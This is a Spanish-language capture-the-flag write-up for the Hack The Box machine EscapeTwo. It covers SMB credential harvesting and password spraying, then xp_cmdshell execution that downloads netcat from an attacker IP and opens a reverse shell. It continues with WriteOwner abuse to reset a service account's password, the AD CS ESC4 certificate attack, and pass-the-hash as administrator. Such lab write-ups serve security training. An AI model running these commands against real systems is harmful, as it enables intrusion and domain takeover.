Escapetwo
OS: Windows
Dificultad: Fácil
Puntos: 20
Nmap Scan
ports=$(nmap -p- --min-rate=5000 -T4 10.129.231.236 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -p $ports -sV -sC 10.129.231.236Nmap scan report for 10.129.231.236
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-13 06:44:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T06:46:23+00:00; -57m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T06:46:22+00:00; -58m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.231.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.231.236:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-01-13T06:46:23+00:00; -57m59s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-12T22:20:26
|_Not valid after: 2055-01-12T22:20:26
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T06:46:23+00:00; -57m59s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T06:46:22+00:00; -58m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0Enumeracion
Nmap nos muestra un dominio el cual agregamos a nuestro archivo hosts.
echo '10.129.231.236 sequel.htb' >> /etc/hostsEn la plataforma de HTB si leemos el dialogo que esta en MACHINE INFORMATION ya nos proporcionan credenciales.
rose : KxEPkKe6R8suSMB
Enumerando el servicio SMB identificamos los directorios compartidos entre los que destaca Accounting Department.
smbmap -u "rose" -p "KxEPkKe6R8su" -H sequel.htb[+] IP: 10.129.231.236:445 Name: sequel.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
Accounting Department READ ONLY
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLYAccedemos al directorio compartido de la siguiente forma.
smbclient -U 'rose' '//sequel.htb/Accounting Department'Dentro del directorio vemos 2 archivos xlsx lo cuales descargamos a nuestra maquina.
Password for [WORKGROUP\rose]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jun 9 06:52:21 2024
.. D 0 Sun Jun 9 06:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 06:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 06:52:07 2024
6367231 blocks of size 4096. 919756 blocks available
smb: \> get accounts.xlsx
getting file \accounts.xlsx of size 6780 as accounts.xlsx (12.6 KiloBytes/sec) (average 12.6 KiloBytes/sec)
smb: \> get accounting_2024.xlsx
getting file \accounting_2024.xlsx of size 10217 as accounting_2024.xlsx (16.8 KiloBytes/sec) (average 14.8 KiloBytes/sec)
smb: \> exitSi intentamos abrir los documentos en excel nos dara un error, al igual que si los abrimos con libreoffice nos mostrara lo siguiente.
Usando el comando unzip podemos extraer la informacion sin necesidad de abrir los archivos.
unzip accounts.xlsx -d accountsArchive: accounts.xlsx
file #1: bad zipfile offset (local header sig): 0
inflating: accounts/xl/workbook.xml
inflating: accounts/xl/theme/theme1.xml
inflating: accounts/xl/styles.xml
inflating: accounts/xl/worksheets/_rels/sheet1.xml.rels
inflating: accounts/xl/worksheets/sheet1.xml
inflating: accounts/xl/sharedStrings.xml
inflating: accounts/_rels/.rels
inflating: accounts/docProps/core.xml
inflating: accounts/docProps/app.xml
inflating: accounts/docProps/custom.xml
inflating: accounts/[Content_Types].xmlEl archivo accounts.xlsx una vez que extraemos la informacion vemos usuarios y passwords en la ruta xl/sharedStrings.xml.
cat accounts/xl/sharedStrings.xml<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24"><si><t xml:space="preserve">First Name</t></si><si><t xml:space="preserve">Last Name</t></si><si><t xml:space="preserve">Email</t></si><si><t xml:space="preserve">Username</t></si><si><t xml:space="preserve">Password</t></si><si><t xml:space="preserve">Angela</t></si><si><t xml:space="preserve">Martin</t></si><si><t xml:space="preserve">angela@sequel.htb</t></si><si><t xml:space="preserve">angela</t></si><si><t xml:space="preserve">0fwz7Q4mSpurIt99</t></si><si><t xml:space="preserve">Oscar</t></si><si><t xml:space="preserve">Martinez</t></si><si><t xml:space="preserve">oscar@sequel.htb</t></si><si><t xml:space="preserve">oscar</t></si><si><t xml:space="preserve">86LxLBMgEWaKUnBG</t></si><si><t xml:space="preserve">Kevin</t></si><si><t xml:space="preserve">Malone</t></si><si><t xml:space="preserve">kevin@sequel.htb</t></si><si><t xml:space="preserve">kevin</t></si><si><t xml:space="preserve">Md9Wlq1E5bZnVDVo</t></si><si><t xml:space="preserve">NULL</t></si><si><t xml:space="preserve">sa@sequel.htb</t></si><si><t xml:space="preserve">sa</t></si><si><t xml:space="preserve">MSSQLP@ssw0rd!</t></si></sst>Los usuarios que obtenemos son los siguientes.
angela : 0fwz7Q4mSpurIt99
oscar : 86LxLBMgEWaKUnBG
kevin : d9Wlq1E5bZnVDVo
sa : MSSQLP@ssw0rd!Password Spray
Utilizando la lista de usuarios y password realizamos un password spray y el unico usuario valido es para SMB es oscar.
netexec smb sequel.htb -u users.txt -p pass.txt --continue...
...
SMB 10.129.231.236 445 DC01 [+] sequel.htb\oscar:86LxLBMgEWaKUnBG
...
...Sin embargo haciendo lo mismo para el servicio MSSQL hay un usuario valido sa que tiene permisos de administrador en el servicio, ya que vemos el mensaje Pwn3d!.
netexec mssql sequel.htb -u users.txt -p pass.txt --local-auth --continue...
...
MSSQL 10.129.231.236 1433 DC01 [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
...
...MSSQL Command Execution
Nos conectamos a MSSQL con las credenciales utilizando impacket.
impacket-mssqlclient sa:'MSSQLP@ssw0rd!'@sequel.htbImpacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa dbo@master)>Ya que tenemos permisos de administrador podemos habilitar el comando xp_cmdshell para otener ejecucion de comandos.
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;SQL (sa dbo@master)> EXEC sp_configure 'show advanced options',1;
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> RECONFIGURE;
SQL (sa dbo@master)> EXEC sp_configure 'xp_cmdshell',1;
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> RECONFIGURE;Ahora podemos ejecutar comandos.
SQL (sa dbo@master)> xp_cmdshell whoami
output
--------------
sequel\sql_svc
NULLReverse Shell
Para obtener una reverse shell haremos lo siguiente. Creamos una carpeta en la raiz.
xp_cmdshell "mkdir c:\temp"SQL (sa dbo@master)> xp_cmdshell "mkdir c:\temp"
output
------
NULL Usaremos el binario nc64.exe. Levantamos nuestro servidor web donde descargamos el binario.
python3 -m http.server 80Posteriormente lo descargamos en la maquina.
xp_cmdshell "curl http://10.10.14.33/nc64.exe -o c:\temp\nc.exe"SQL (sa dbo@master)> xp_cmdshell "curl http://10.10.14.33/nc64.exe -o c:\temp\nc.exe"
output
--------------------------------------------------------------------------------
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 45272 100 45272 0 0 99k 0 --:--:-- --:--:-- --:--:-- 101k
NULLPara finalizar ponemos a la escucha nuestro netcat.
nc -lvnp 1234Ejecutamos el siguiente comando para obtener la reverse shell.
xp_cmdshell "c:\temp\nc.exe 10.10.14.33 1234 -e cmd.exe"
Lateral Movement
Enumerando archivos de la base de datos vemos un password en el siguiente archivo.
type c:\SQL2019\ExpressAdv_ENU\sql-Configuration.INISQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"Realizando password spray identificamos que se puede usar con el usuario ryan.
netexec smb sequel.htb -u users.txt -p WqSZAF6CysDQbGb3SMB 10.129.231.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.236 445 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3Nos conectamos por WinRM.
evil-winrm -i sequel.htb -u ryan -p WqSZAF6CysDQbGb3Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
sequel\ryan
*Evil-WinRM* PS C:\Users\ryan\Documents> dir ..\desktop
Directory: C:\Users\ryan\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/12/2025 2:20 PM 34 user.txtEscalacion de Privilegios
Utilizando bloodhound podemos enumerar los objetos del AD.
Note
Para instalar bloodhound se utiliza los siguientes comandos.
Instalamos bloodhound con apt.apt install bloodhound
Ejecutamos el comando.neo4j console
Accedemos a la url http://localhost:7474/ y el usuario y password es neo4j : neo4j
Una vez que hagamos esto ejecutamos el siguiente comando en otra terminal.bloodhound
python3 /opt/BloodHound.py/bloodhound.py -u ryan -p 'WqSZAF6CysDQbGb3' -c all -d sequel.htb -ns 10.129.231.236 --dns-tcpINFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.sequel.htb:88)] [Errno -5] No address associated with hostname
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.sequel.htb
INFO: Done in 00M 22SWriteOwner User
Vemos que el usuario ryan tiene permisos WriteOwner en el usuario ca_svc.
Por lo tanto el usuario ryan tiene la capacidad de modificar el propietario del usuario ca_svc. Los propietarios de objetos conservan la capacidad de modificar los descriptores de seguridad de los objetos, independientemente de los permisos en el DACL del objeto.
Force Change Password
Para tomar ventaja de este privilegio realizamos lo siguiente. Primero nos hacemos propietario del objeto.
bloodyAD --host 10.129.231.236 -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 set owner ca_svc ryan[+] Old owner S-1-5-21-548670397-972687484-3496335370-512 is now replaced by ryan on ca_svcAhora modificamos los privilegios del objeto para que el usuario ryan tenga acceso total.
bloodyAD --host 10.129.231.236 -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 add genericAll 'ca_svc' 'ryan'[+] ryan has now GenericAll on ca_svcPor ultimo forzamos el cambio de password del usuario ca_svc.
bloodyAD --host 10.129.231.236 -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 set password 'ca_svc' 'D00m123!'[+] Password changed successfully!Verificamos que funciona correctamente el cambio de password.
netexec smb sequel.htb -u ca_svc -p 'D00m123!'SMB 10.129.231.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.236 445 DC01 [+] sequel.htb\ca_svc:D00m123!Certificate Services (AD-CS)
Ya que ese usuario pertenece al grupo Cert Publishers y segun la descripcion puede publicar certitificados
Procedemos a enumerar los certificados en el servidor utilizando Certipy.
certipy find -u 'ca_svc@sequel.htb' -p 'D00m123!' -dc-ip '10.129.231.236' -vulnerable -stdoutCertipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireCommonName
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
PublishToDs
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissionsESC4
Vemos que nos regresa informacion sobre un certificado vulnerable DunderMifflinAuthentication a la tecnica ESC4. ESC4 es posible cuando los templates están mal configuradas a nivel de control de acceso. Si las entradas de control de acceso (ACE) permiten a usuarios no deseados o sin privilegios editar la configuración de seguridad del template, se puede conceder a usuarios uno de los siguientes permisos de seguridad de template:
- Propietario
- WriteOwnerPrincipals
- WriteDaclPrincipals
- WritePropertyPrincipals
Como vemos el usuario cuenta con esos permisos.
Para explotar la vulnerabilidad nos basamos del siguiente blog.
Modificamos el certificado primero.
certipy template -u ca_svc -p 'D00m123!' -template DunderMifflinAuthentication -target DC01.sequel.htb -dc-ip 10.129.231.236 -save-oldCertipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'Solicitamos un certificado de administrador con nuestro template modificado.
Note
En algunas ocasiones tienes que ejeuctar el comando 2 veces para que sea exitoso.
certipy req -ca sequel-DC01-CA -u ca_svc -p 'D00m123!' -template DunderMifflinAuthentication -target DC01.sequel.htb -upn administrator@sequel.htb -dc-ip 10.129.231.236Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 8
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'Por ultimo con el certificado podemos solicitar un TGT o el hash NT del usuario administrator.
certipy auth -pfx administrator.pfxCertipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ffWinRM Access
Nos conectamos por WinRM.
evil-winrm -i sequel.htb -u administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff
Referencias
https://github.com/fortra/impacket
https://github.com/int0x33/nc.exe/
https://github.com/SpecterOps/BloodHound
https://www.thehacker.recipes/ad/movement/dacl/grant-ownership
https://www.thehacker.recipes/ad/movement/dacl/grant-rights
https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
https://github.com/ly4k/Certipy
https://www.nccgroup.com/au/research-blog/defending-your-directory-an-expert-guide-to-fortifying-active-directory-certificate-services-adcs-against-exploitation/
https://redfoxsec.com/blog/exploiting-weak-acls-on-active-directory-certificate-templates-esc4/
https://www.rbtsec.com/blog/active-directory-certificate-services-adcs-esc4/